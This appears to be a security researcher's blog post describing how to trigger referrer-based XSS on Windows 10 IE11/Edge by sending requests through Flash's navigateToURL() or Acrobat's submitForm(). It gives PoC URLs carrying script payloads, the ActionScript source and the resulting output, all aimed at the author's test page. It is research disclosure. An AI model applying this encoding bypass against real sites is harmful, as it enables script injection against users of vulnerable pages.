The following page writes the
https://vulnerabledoma.in/xss_referrer
HTTP_REFERER and document.referrer directly:https://vulnerabledoma.in/xss_referrer
Previously IE/Edge did not encode the
"<> characters in the referrer string. So, we could XSS on that page from the following PoC:https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>
But since the Windows 10 anniversary update, IE11/Edge encodes it. You will get the following encoded string from that page:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3EToo bad!
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Of course, we can still use Win8.1/7 IE11. But also we want to XSS on Win10, don't you? :D
Today, I would like to introduce a small technique, XSS using the referrer on latest Win10 Edge/IE11.
The technique is very simple. You can easily include
"<> string into the referrer if you send the request from Flash's navigateToURL() method, like this:https://l0.cm/xss_referrer.swf?<script>alert(1)</script>
The ActionScript code is here:
package {As you can see the access result, we can XSS via the
import flash.display.Sprite;
import flash.net.URLRequest;
import flash.net.navigateToURL;
public class xss_referrer extends Sprite{
public function xss_referrer() {
var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
navigateToURL(url, "_self");
}
}
}
Referer request header. But sadly, we cannot XSS via the document.referrer property because it becomes empty. Dang :pFYI, also I can reproduce it via the submitForm() method of JavaScript for Acrobat API.
I confirmed it on Win10 IE11 with Adobe Reader plugin.
PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>
It seems that the request via plugins is not considered.
That's it. It might be helpful in some cases :)
Thanks!